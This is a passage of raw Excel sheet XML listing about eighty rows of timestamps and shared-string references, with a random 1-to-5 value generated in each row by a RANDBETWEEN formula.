      <c r="C20655" t="s">
        <v>10</v>
      </c>
      <c r="D20655" t="s">
        <v>39</v>
      </c>
      <c r="E20655" s="2" t="s">
        <v>18589</v>
      </c>
      <c r="F20655">
        <f t="shared" ca="1" si="322"/>
        <v>3</v>
      </c>
    </row>
    <row r="20656" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20656" s="1">
        <v>43109.601261574076</v>
      </c>
      <c r="C20656" t="s">
        <v>10</v>
      </c>
      <c r="D20656" t="s">
        <v>86</v>
      </c>
      <c r="E20656" s="2" t="s">
        <v>18590</v>
      </c>
      <c r="F20656">
        <f t="shared" ca="1" si="322"/>
        <v>3</v>
      </c>
    </row>
    <row r="20657" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20657" s="1">
        <v>43109.575185185182</v>
      </c>
      <c r="C20657" t="s">
        <v>10</v>
      </c>
      <c r="D20657" t="s">
        <v>271</v>
      </c>
      <c r="E20657" s="2" t="s">
        <v>18591</v>
      </c>
      <c r="F20657">
        <f t="shared" ca="1" si="322"/>
        <v>1</v>
      </c>
    </row>
    <row r="20658" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20658" s="1">
        <v>43109.567916666667</v>
      </c>
      <c r="C20658" t="s">
        <v>10</v>
      </c>
      <c r="D20658" t="s">
        <v>6</v>
      </c>
      <c r="E20658" t="s">
        <v>18592</v>
      </c>
      <c r="F20658">
        <f t="shared" ca="1" si="322"/>
        <v>1</v>
      </c>
    </row>
    <row r="20659" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20659" s="1">
        <v>43109.563275462962</v>
      </c>
      <c r="C20659" t="s">
        <v>10</v>
      </c>
      <c r="D20659" t="s">
        <v>1091</v>
      </c>
      <c r="E20659" s="2" t="s">
        <v>18593</v>
      </c>
      <c r="F20659">
        <f t="shared" ca="1" si="322"/>
        <v>3</v>
      </c>
    </row>
    <row r="20660" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20660" s="1">
        <v>43109.54855324074</v>
      </c>
      <c r="C20660" t="s">
        <v>10</v>
      </c>
      <c r="D20660" t="s">
        <v>89</v>
      </c>
      <c r="E20660" t="s">
        <v>18594</v>
      </c>
      <c r="F20660">
        <f t="shared" ca="1" si="322"/>
        <v>3</v>
      </c>
    </row>
    <row r="20661" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20661" s="1">
        <v>43109.534513888888</v>
      </c>
      <c r="C20661" t="s">
        <v>6</v>
      </c>
      <c r="D20661" t="s">
        <v>67</v>
      </c>
      <c r="E20661" t="s">
        <v>18595</v>
      </c>
      <c r="F20661">
        <f t="shared" ca="1" si="322"/>
        <v>3</v>
      </c>
    </row>
    <row r="20662" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20662" s="1">
        <v>43109.514363425929</v>
      </c>
      <c r="C20662" t="s">
        <v>10</v>
      </c>
      <c r="D20662" t="s">
        <v>163</v>
      </c>
      <c r="E20662" s="2" t="s">
        <v>18596</v>
      </c>
      <c r="F20662">
        <f t="shared" ca="1" si="322"/>
        <v>4</v>
      </c>
    </row>
    <row r="20663" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20663" s="1">
        <v>43109.506979166668</v>
      </c>
      <c r="C20663" t="s">
        <v>10</v>
      </c>
      <c r="D20663" t="s">
        <v>817</v>
      </c>
      <c r="E20663" t="s">
        <v>18597</v>
      </c>
      <c r="F20663">
        <f t="shared" ca="1" si="322"/>
        <v>3</v>
      </c>
    </row>
    <row r="20664" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20664" s="1">
        <v>43109.506828703707</v>
      </c>
      <c r="C20664" t="s">
        <v>10</v>
      </c>
      <c r="D20664" t="s">
        <v>817</v>
      </c>
      <c r="E20664" t="s">
        <v>18597</v>
      </c>
      <c r="F20664">
        <f t="shared" ca="1" si="322"/>
        <v>2</v>
      </c>
    </row>
    <row r="20665" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20665" s="1">
        <v>43109.501493055555</v>
      </c>
      <c r="C20665" t="s">
        <v>43</v>
      </c>
      <c r="E20665" t="s">
        <v>18598</v>
      </c>
      <c r="F20665">
        <f t="shared" ca="1" si="322"/>
        <v>3</v>
      </c>
    </row>
    <row r="20666" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20666" s="1">
        <v>43109.501469907409</v>
      </c>
      <c r="C20666" t="s">
        <v>10</v>
      </c>
      <c r="D20666" t="s">
        <v>52</v>
      </c>
      <c r="E20666" t="s">
        <v>18599</v>
      </c>
      <c r="F20666">
        <f t="shared" ca="1" si="322"/>
        <v>4</v>
      </c>
    </row>
    <row r="20667" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20667" s="1">
        <v>43109.491365740738</v>
      </c>
      <c r="C20667" t="s">
        <v>10</v>
      </c>
      <c r="D20667" t="s">
        <v>80</v>
      </c>
      <c r="F20667">
        <f t="shared" ca="1" si="322"/>
        <v>5</v>
      </c>
    </row>
    <row r="20668" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20668" s="1">
        <v>43109.490451388891</v>
      </c>
      <c r="C20668" t="s">
        <v>10</v>
      </c>
      <c r="D20668" t="s">
        <v>80</v>
      </c>
      <c r="E20668" t="s">
        <v>18600</v>
      </c>
      <c r="F20668">
        <f t="shared" ca="1" si="322"/>
        <v>4</v>
      </c>
    </row>
    <row r="20669" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20669" s="1">
        <v>43109.488981481481</v>
      </c>
      <c r="C20669" t="s">
        <v>10</v>
      </c>
      <c r="D20669" t="s">
        <v>80</v>
      </c>
      <c r="E20669" t="s">
        <v>3773</v>
      </c>
      <c r="F20669">
        <f t="shared" ca="1" si="322"/>
        <v>5</v>
      </c>
    </row>
    <row r="20670" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20670" s="1">
        <v>43109.487407407411</v>
      </c>
      <c r="C20670" t="s">
        <v>10</v>
      </c>
      <c r="D20670" t="s">
        <v>86</v>
      </c>
      <c r="E20670" t="s">
        <v>18601</v>
      </c>
      <c r="F20670">
        <f t="shared" ca="1" si="322"/>
        <v>5</v>
      </c>
    </row>
    <row r="20671" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20671" s="1">
        <v>43109.487245370372</v>
      </c>
      <c r="C20671" t="s">
        <v>10</v>
      </c>
      <c r="D20671" t="s">
        <v>52</v>
      </c>
      <c r="E20671" t="s">
        <v>18602</v>
      </c>
      <c r="F20671">
        <f t="shared" ca="1" si="322"/>
        <v>3</v>
      </c>
    </row>
    <row r="20672" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20672" s="1">
        <v>43109.486226851855</v>
      </c>
      <c r="C20672" t="s">
        <v>10</v>
      </c>
      <c r="D20672" t="s">
        <v>80</v>
      </c>
      <c r="E20672" t="s">
        <v>18603</v>
      </c>
      <c r="F20672">
        <f t="shared" ca="1" si="322"/>
        <v>5</v>
      </c>
    </row>
    <row r="20673" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20673" s="1">
        <v>43109.467233796298</v>
      </c>
      <c r="C20673" t="s">
        <v>10</v>
      </c>
      <c r="D20673" t="s">
        <v>56</v>
      </c>
      <c r="E20673" t="s">
        <v>18604</v>
      </c>
      <c r="F20673">
        <f t="shared" ca="1" si="322"/>
        <v>1</v>
      </c>
    </row>
    <row r="20674" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20674" s="1">
        <v>43109.445729166669</v>
      </c>
      <c r="C20674" t="s">
        <v>10</v>
      </c>
      <c r="D20674" t="s">
        <v>263</v>
      </c>
      <c r="E20674" t="s">
        <v>18605</v>
      </c>
      <c r="F20674">
        <f t="shared" ref="F20674:F20737" ca="1" si="323">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="20675" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20675" s="1">
        <v>43109.431597222225</v>
      </c>
      <c r="C20675" t="s">
        <v>6</v>
      </c>
      <c r="D20675" t="s">
        <v>25</v>
      </c>
      <c r="E20675" t="s">
        <v>18606</v>
      </c>
      <c r="F20675">
        <f t="shared" ca="1" si="323"/>
        <v>4</v>
      </c>
    </row>
    <row r="20676" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20676" s="1">
        <v>43109.430011574077</v>
      </c>
      <c r="C20676" t="s">
        <v>10</v>
      </c>
      <c r="D20676" t="s">
        <v>222</v>
      </c>
      <c r="E20676" s="2" t="s">
        <v>18607</v>
      </c>
      <c r="F20676">
        <f t="shared" ca="1" si="323"/>
        <v>3</v>
      </c>
    </row>
    <row r="20677" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20677" s="1">
        <v>43109.40357638889</v>
      </c>
      <c r="C20677" t="s">
        <v>10</v>
      </c>
      <c r="D20677" t="s">
        <v>52</v>
      </c>
      <c r="E20677" t="s">
        <v>18608</v>
      </c>
      <c r="F20677">
        <f t="shared" ca="1" si="323"/>
        <v>2</v>
      </c>
    </row>
    <row r="20678" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20678" s="1">
        <v>43109.377627314818</v>
      </c>
      <c r="C20678" t="s">
        <v>41</v>
      </c>
      <c r="E20678" t="s">
        <v>18609</v>
      </c>
      <c r="F20678">
        <f t="shared" ca="1" si="323"/>
        <v>3</v>
      </c>
    </row>
    <row r="20679" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20679" s="1">
        <v>43109.341979166667</v>
      </c>
      <c r="C20679" t="s">
        <v>586</v>
      </c>
      <c r="D20679" t="s">
        <v>312</v>
      </c>
      <c r="E20679" s="2" t="s">
        <v>18610</v>
      </c>
      <c r="F20679">
        <f t="shared" ca="1" si="323"/>
        <v>1</v>
      </c>
    </row>
    <row r="20680" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20680" s="1">
        <v>43109.303425925929</v>
      </c>
      <c r="C20680" t="s">
        <v>197</v>
      </c>
      <c r="E20680" s="2" t="s">
        <v>18611</v>
      </c>
      <c r="F20680">
        <f t="shared" ca="1" si="323"/>
        <v>5</v>
      </c>
    </row>
    <row r="20681" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A20681" s="1">
        <v>43109.271932870368</v>
      </c>
      <c r="C20681" t="s">
        <v>41</v>
      </c>
      <c r="D20681" t="s">
        <v>312</v>
      </c>
      <c r="E20681" s="2" t="s">
        <v>18612</v>
      </c>
      <c r="F20681">
        <f t="shared" ca="1" si="323"/>
        <v>1</v>
      </c>
    </row>
    <row r="20682" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20682" s="1">
        <v>43109.217175925929</v>
      </c>
      <c r="C20682" t="s">
        <v>124</v>
      </c>
      <c r="E20682" s="2" t="s">
        <v>18613</v>
      </c>
      <c r="F20682">
        <f t="shared" ca="1" si="323"/>
        <v>4</v>
      </c>
    </row>
    <row r="20683" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20683" s="1">
        <v>43109.214085648149</v>
      </c>
      <c r="C20683" t="s">
        <v>41</v>
      </c>
      <c r="D20683" t="s">
        <v>312</v>
      </c>
      <c r="E20683" t="s">
        <v>18614</v>
      </c>
      <c r="F20683">
        <f t="shared" ca="1" si="323"/>
        <v>3</v>
      </c>
    </row>
    <row r="20684" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20684" s="1">
        <v>43109.205150462964</v>
      </c>
      <c r="C20684" t="s">
        <v>48</v>
      </c>
      <c r="E20684" t="s">
        <v>18615</v>
      </c>
      <c r="F20684">
        <f t="shared" ca="1" si="323"/>
        <v>4</v>
      </c>
    </row>
    <row r="20685" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20685" s="1">
        <v>43109.101863425924</v>
      </c>
      <c r="C20685" t="s">
        <v>197</v>
      </c>
      <c r="E20685" t="s">
        <v>18616</v>
      </c>
      <c r="F20685">
        <f t="shared" ca="1" si="323"/>
        <v>5</v>
      </c>
    </row>
    <row r="20686" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20686" s="1">
        <v>43109.060659722221</v>
      </c>
      <c r="C20686" t="s">
        <v>41</v>
      </c>
      <c r="E20686" t="s">
        <v>18617</v>
      </c>
      <c r="F20686">
        <f t="shared" ca="1" si="323"/>
        <v>1</v>
      </c>
    </row>
    <row r="20687" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20687" s="1">
        <v>43109.017395833333</v>
      </c>
      <c r="C20687" t="s">
        <v>41</v>
      </c>
      <c r="E20687" s="2" t="s">
        <v>18618</v>
      </c>
      <c r="F20687">
        <f t="shared" ca="1" si="323"/>
        <v>3</v>
      </c>
    </row>
    <row r="20688" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A20688" s="1">
        <v>43108.932280092595</v>
      </c>
      <c r="C20688" t="s">
        <v>139</v>
      </c>
      <c r="E20688" s="2" t="s">
        <v>18619</v>
      </c>
      <c r="F20688">
        <f t="shared" ca="1" si="323"/>
        <v>2</v>
      </c>
    </row>
    <row r="20689" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20689" s="1">
        <v>43108.79011574074</v>
      </c>
      <c r="C20689" t="s">
        <v>10</v>
      </c>
      <c r="D20689" t="s">
        <v>6</v>
      </c>
      <c r="E20689" t="s">
        <v>6496</v>
      </c>
      <c r="F20689">
        <f t="shared" ca="1" si="323"/>
        <v>4</v>
      </c>
    </row>
    <row r="20690" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20690" s="1">
        <v>43108.739085648151</v>
      </c>
      <c r="C20690" t="s">
        <v>10</v>
      </c>
      <c r="D20690" t="s">
        <v>89</v>
      </c>
      <c r="E20690" s="2" t="s">
        <v>18620</v>
      </c>
      <c r="F20690">
        <f t="shared" ca="1" si="323"/>
        <v>1</v>
      </c>
    </row>
    <row r="20691" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A20691" s="1">
        <v>43108.731712962966</v>
      </c>
      <c r="C20691" t="s">
        <v>10</v>
      </c>
      <c r="D20691" t="s">
        <v>6</v>
      </c>
      <c r="E20691" s="2" t="s">
        <v>18621</v>
      </c>
      <c r="F20691">
        <f t="shared" ca="1" si="323"/>
        <v>5</v>
      </c>
    </row>
    <row r="20692" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20692" s="1">
        <v>43108.728576388887</v>
      </c>
      <c r="C20692" t="s">
        <v>10</v>
      </c>
      <c r="D20692" t="s">
        <v>89</v>
      </c>
      <c r="E20692" t="s">
        <v>18622</v>
      </c>
      <c r="F20692">
        <f t="shared" ca="1" si="323"/>
        <v>5</v>
      </c>
    </row>
    <row r="20693" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A20693" s="1">
        <v>43108.717141203706</v>
      </c>
      <c r="C20693" t="s">
        <v>13307</v>
      </c>
      <c r="D20693" t="s">
        <v>114</v>
      </c>
      <c r="E20693" s="2" t="s">
        <v>18623</v>
      </c>
      <c r="F20693">
        <f t="shared" ca="1" si="323"/>
        <v>1</v>
      </c>
    </row>
    <row r="20694" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20694" s="1">
        <v>43108.706446759257</v>
      </c>
      <c r="C20694" t="s">
        <v>10</v>
      </c>
      <c r="D20694" t="s">
        <v>36</v>
      </c>
      <c r="E20694" t="s">
        <v>18624</v>
      </c>
      <c r="F20694">
        <f t="shared" ca="1" si="323"/>
        <v>1</v>
      </c>
    </row>
    <row r="20695" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20695" s="1">
        <v>43108.703321759262</v>
      </c>
      <c r="C20695" t="s">
        <v>10</v>
      </c>
      <c r="D20695" t="s">
        <v>374</v>
      </c>
      <c r="E20695" t="s">
        <v>18625</v>
      </c>
      <c r="F20695">
        <f t="shared" ca="1" si="323"/>
        <v>3</v>
      </c>
    </row>
    <row r="20696" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20696" s="1">
        <v>43108.697500000002</v>
      </c>
      <c r="C20696" t="s">
        <v>10</v>
      </c>
      <c r="D20696" t="s">
        <v>178</v>
      </c>
      <c r="E20696" t="s">
        <v>18626</v>
      </c>
      <c r="F20696">
        <f t="shared" ca="1" si="323"/>
        <v>4</v>
      </c>
    </row>
    <row r="20697" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A20697" s="1">
        <v>43108.685347222221</v>
      </c>
      <c r="C20697" t="s">
        <v>10</v>
      </c>
      <c r="D20697" t="s">
        <v>92</v>
      </c>
      <c r="E20697" s="2" t="s">
        <v>18627</v>
      </c>
      <c r="F20697">
        <f t="shared" ca="1" si="323"/>
        <v>4</v>
      </c>
    </row>
    <row r="20698" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20698" s="1">
        <v>43108.657951388886</v>
      </c>
      <c r="C20698" t="s">
        <v>10</v>
      </c>
      <c r="D20698" t="s">
        <v>151</v>
      </c>
      <c r="E20698" t="s">
        <v>18628</v>
      </c>
      <c r="F20698">
        <f t="shared" ca="1" si="323"/>
        <v>5</v>
      </c>
    </row>
    <row r="20699" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20699" s="1">
        <v>43108.657905092594</v>
      </c>
      <c r="C20699" t="s">
        <v>10</v>
      </c>
      <c r="D20699" t="s">
        <v>52</v>
      </c>
      <c r="E20699" t="s">
        <v>18629</v>
      </c>
      <c r="F20699">
        <f t="shared" ca="1" si="323"/>
        <v>4</v>
      </c>
    </row>
    <row r="20700" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20700" s="1">
        <v>43108.655659722222</v>
      </c>
      <c r="C20700" t="s">
        <v>6</v>
      </c>
      <c r="D20700" t="s">
        <v>25</v>
      </c>
      <c r="E20700" s="2" t="s">
        <v>18630</v>
      </c>
      <c r="F20700">
        <f t="shared" ca="1" si="323"/>
        <v>2</v>
      </c>
    </row>
    <row r="20701" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20701" s="1">
        <v>43108.646539351852</v>
      </c>
      <c r="C20701" t="s">
        <v>10</v>
      </c>
      <c r="D20701" t="s">
        <v>80</v>
      </c>
      <c r="E20701" t="s">
        <v>18631</v>
      </c>
      <c r="F20701">
        <f t="shared" ca="1" si="323"/>
        <v>2</v>
      </c>
    </row>
    <row r="20702" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20702" s="1">
        <v>43108.610081018516</v>
      </c>
      <c r="C20702" t="s">
        <v>6</v>
      </c>
      <c r="D20702" t="s">
        <v>25</v>
      </c>
      <c r="E20702" t="s">
        <v>18632</v>
      </c>
      <c r="F20702">
        <f t="shared" ca="1" si="323"/>
        <v>5</v>
      </c>
    </row>
    <row r="20703" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20703" s="1">
        <v>43108.606249999997</v>
      </c>
      <c r="C20703" t="s">
        <v>6</v>
      </c>
      <c r="D20703" t="s">
        <v>25</v>
      </c>
      <c r="E20703" t="s">
        <v>18633</v>
      </c>
      <c r="F20703">
        <f t="shared" ca="1" si="323"/>
        <v>4</v>
      </c>
    </row>
    <row r="20704" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A20704" s="1">
        <v>43108.578136574077</v>
      </c>
      <c r="C20704" t="s">
        <v>10</v>
      </c>
      <c r="D20704" t="s">
        <v>17</v>
      </c>
      <c r="E20704" s="2" t="s">
        <v>18634</v>
      </c>
      <c r="F20704">
        <f t="shared" ca="1" si="323"/>
        <v>2</v>
      </c>
    </row>
    <row r="20705" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20705" s="1">
        <v>43108.557893518519</v>
      </c>
      <c r="C20705" t="s">
        <v>10</v>
      </c>
      <c r="D20705" t="s">
        <v>52</v>
      </c>
      <c r="E20705" s="2" t="s">
        <v>18635</v>
      </c>
      <c r="F20705">
        <f t="shared" ca="1" si="323"/>
        <v>4</v>
      </c>
    </row>
    <row r="20706" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20706" s="1">
        <v>43108.542534722219</v>
      </c>
      <c r="C20706" t="s">
        <v>10</v>
      </c>
      <c r="D20706" t="s">
        <v>163</v>
      </c>
      <c r="E20706" t="s">
        <v>18636</v>
      </c>
      <c r="F20706">
        <f t="shared" ca="1" si="323"/>
        <v>1</v>
      </c>
    </row>
    <row r="20707" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A20707" s="1">
        <v>43108.524386574078</v>
      </c>
      <c r="C20707" t="s">
        <v>6</v>
      </c>
      <c r="D20707" t="s">
        <v>194</v>
      </c>
      <c r="E20707" s="2" t="s">
        <v>18637</v>
      </c>
      <c r="F20707">
        <f t="shared" ca="1" si="323"/>
        <v>5</v>
      </c>
    </row>
    <row r="20708" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A20708" s="1">
        <v>43108.493252314816</v>
      </c>
      <c r="C20708" t="s">
        <v>10</v>
      </c>
      <c r="D20708" t="s">
        <v>52</v>
      </c>
      <c r="E20708" s="2" t="s">
        <v>18638</v>
      </c>
      <c r="F20708">
        <f t="shared" ca="1" si="323"/>
        <v>2</v>
      </c>
    </row>
    <row r="20709" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20709" s="1">
        <v>43108.480844907404</v>
      </c>
      <c r="C20709" t="s">
        <v>10</v>
      </c>
      <c r="D20709" t="s">
        <v>1056</v>
      </c>
      <c r="E20709" s="2" t="s">
        <v>18639</v>
      </c>
      <c r="F20709">
        <f t="shared" ca="1" si="323"/>
        <v>2</v>
      </c>
    </row>
    <row r="20710" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20710" s="1">
        <v>43108.459097222221</v>
      </c>
      <c r="C20710" t="s">
        <v>10</v>
      </c>
      <c r="D20710" t="s">
        <v>36</v>
      </c>
      <c r="E20710" t="s">
        <v>18640</v>
      </c>
      <c r="F20710">
        <f t="shared" ca="1" si="323"/>
        <v>2</v>
      </c>
    </row>
    <row r="20711" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20711" s="1">
        <v>43108.453530092593</v>
      </c>
      <c r="C20711" t="s">
        <v>430</v>
      </c>
      <c r="E20711" s="2" t="s">
        <v>18641</v>
      </c>
      <c r="F20711">
        <f t="shared" ca="1" si="323"/>
        <v>5</v>
      </c>
    </row>
    <row r="20712" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20712" s="1">
        <v>43108.45076388889</v>
      </c>
      <c r="C20712" t="s">
        <v>10</v>
      </c>
      <c r="D20712" t="s">
        <v>39</v>
      </c>
      <c r="E20712" t="s">
        <v>18642</v>
      </c>
      <c r="F20712">
        <f t="shared" ca="1" si="323"/>
        <v>4</v>
      </c>
    </row>
    <row r="20713" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20713" s="1">
        <v>43108.447847222225</v>
      </c>
      <c r="C20713" t="s">
        <v>10</v>
      </c>
      <c r="D20713" t="s">
        <v>163</v>
      </c>
      <c r="E20713" t="s">
        <v>18643</v>
      </c>
      <c r="F20713">
        <f t="shared" ca="1" si="323"/>
        <v>3</v>
      </c>
    </row>
    <row r="20714" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20714" s="1">
        <v>43108.447337962964</v>
      </c>
      <c r="C20714" t="s">
        <v>124</v>
      </c>
      <c r="E20714" t="s">
        <v>18644</v>
      </c>
      <c r="F20714">
        <f t="shared" ca="1" si="323"/>
        <v>2</v>
      </c>
    </row>
    <row r="20715" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20715" s="1">
        <v>43108.441145833334</v>
      </c>
      <c r="C20715" t="s">
        <v>1080</v>
      </c>
      <c r="E20715" t="s">
        <v>18645</v>
      </c>
      <c r="F20715">
        <f t="shared" ca="1" si="323"/>
        <v>3</v>
      </c>
    </row>
    <row r="20716" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20716" s="1">
        <v>43108.433275462965</v>
      </c>
      <c r="C20716" t="s">
        <v>10</v>
      </c>
      <c r="D20716" t="s">
        <v>89</v>
      </c>
      <c r="E20716" t="s">
        <v>18646</v>
      </c>
      <c r="F20716">
        <f t="shared" ca="1" si="323"/>
        <v>1</v>
      </c>
    </row>
    <row r="20717" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20717" s="1">
        <v>43108.433032407411</v>
      </c>
      <c r="C20717" t="s">
        <v>6</v>
      </c>
      <c r="D20717" t="s">
        <v>114</v>
      </c>
      <c r="E20717" s="2" t="s">
        <v>18647</v>
      </c>
      <c r="F20717">
        <f t="shared" ca="1" si="323"/>
        <v>2</v>
      </c>
    </row>
    <row r="20718" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20718" s="1">
        <v>43108.432511574072</v>
      </c>
      <c r="C20718" t="s">
        <v>454</v>
      </c>
      <c r="E20718" s="2" t="s">
        <v>18648</v>
      </c>
      <c r="F20718">
        <f t="shared" ca="1" si="323"/>
        <v>2</v>
      </c>
    </row>
    <row r="20719" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A20719" s="1">
        <v>43108.431886574072</v>
      </c>
      <c r="C20719" t="s">
        <v>41</v>
      </c>
      <c r="E20719" s="2" t="s">
        <v>18649</v>
      </c>
      <c r="F20719">
        <f t="shared" ca="1" si="323"/>
        <v>1</v>
      </c>
    </row>
    <row r="20720" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20720" s="1">
        <v>43108.425740740742</v>
      </c>
      <c r="C20720" t="s">
        <v>48</v>
      </c>
      <c r="E20720" s="2" t="s">
        <v>18650</v>
      </c>
      <c r="F20720">
        <f t="shared" ca="1" si="323"/>
        <v>5</v>
      </c>
    </row>
    <row r="20721" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20721" s="1">
        <v>43108.41165509259</v>
      </c>
      <c r="C20721" t="s">
        <v>10</v>
      </c>
      <c r="D20721" t="s">
        <v>192</v>
      </c>
      <c r="E20721" t="s">
        <v>18651</v>
      </c>
      <c r="F20721">
        <f t="shared" ca="1" si="323"/>
        <v>1</v>
      </c>
    </row>
    <row r="20722" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A20722" s="1">
        <v>43108.360254629632</v>
      </c>
      <c r="C20722" t="s">
        <v>1501</v>
      </c>
      <c r="E20722" s="2" t="s">
        <v>18652</v>
      </c>
      <c r="F20722">
        <f t="shared" ca="1" si="323"/>
        <v>3</v>
      </c>
    </row>
    <row r="20723" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20723" s="1">
        <v>43108.35837962963</v>
      </c>
      <c r="C20723" t="s">
        <v>10</v>
      </c>
      <c r="D20723" t="s">
        <v>263</v>
      </c>
      <c r="E20723" t="s">
        <v>18653</v>
      </c>
      <c r="F20723">
        <f t="shared" ca="1" si="323"/>
        <v>3</v>
      </c>
    </row>
    <row r="20724" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A20724" s="1">
        <v>43108.344502314816</v>
      </c>
      <c r="C20724" t="s">
        <v>559</v>
      </c>
      <c r="E20724" s="2" t="s">
        <v>18654</v>
      </c>
      <c r="F20724">
        <f t="shared" ca="1" si="323"/>
        <v>3</v>
      </c>
    </row>
    <row r="20725" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A20725" s="1">
        <v>43108.283773148149</v>
      </c>
      <c r="C20725" t="s">
        <v>10</v>
      </c>
      <c r="D20725" t="s">
        <v>46</v>
      </c>
      <c r="E20725" s="2" t="s">
        <v>18655</v>
      </c>
      <c r="F20725">
        <f t="shared" ca="1" si="323"/>
        <v>2</v>
      </c>
    </row>
    <row r="20726" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20726" s="1">
        <v>43108.281863425924</v>
      </c>
      <c r="C20726" t="s">
        <v>16</v>
      </c>
      <c r="E20726" t="s">
        <v>18656</v>
      </c>
      <c r="F20726">
        <f t="shared" ca="1" si="323"/>
        <v>3</v>
      </c>
    </row>
    <row r="20727" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20727" s="1">
        <v>43108.245474537034</v>
      </c>
      <c r="C20727" t="s">
        <v>41</v>
      </c>
      <c r="D20727" t="s">
        <v>312</v>
      </c>
      <c r="E20727" t="s">
        <v>18657</v>
      </c>
      <c r="F20727">
        <f t="shared" ca="1" si="323"/>
        <v>5</v>
      </c>
    </row>
    <row r="20728" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20728" s="1">
        <v>43108.235486111109</v>
      </c>
      <c r="C20728" t="s">
        <v>71</v>
      </c>
      <c r="E20728" s="2" t="s">
        <v>18658</v>
      </c>
      <c r="F20728">
        <f t="shared" ca="1" si="323"/>
        <v>4</v>
      </c>
    </row>
    <row r="20729" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A20729" s="1">
        <v>43108.166967592595</v>
      </c>
      <c r="C20729" t="s">
        <v>73</v>
      </c>
      <c r="E20729" s="2" t="s">
        <v>18659</v>
      </c>
      <c r="F20729">
        <f t="shared" ca="1" si="323"/>
        <v>5</v>
      </c>
    </row>
    <row r="20730" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20730" s="1">
        <v>43108.06459490741</v>
      </c>
      <c r="C20730" t="s">
        <v>10</v>
      </c>
      <c r="D20730" t="s">
        <v>52</v>
      </c>
      <c r="E20730" t="s">
        <v>18660</v>
      </c>
      <c r="F20730">
        <f t="shared" ca="1" si="323"/>
        <v>4</v>
      </c>
    </row>
    <row r="20731" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20731" s="1">
        <v>43107.964826388888</v>
      </c>
      <c r="C20731" t="s">
        <v>3443</v>
      </c>
      <c r="E20731" t="s">
        <v>18661</v>
      </c>
      <c r="F20731">
        <f t="shared" ca="1" si="323"/>
        <v>1</v>
      </c>
    </row>
    <row r="20732" spans="1:6" x14ac:dyDescent="0.25">
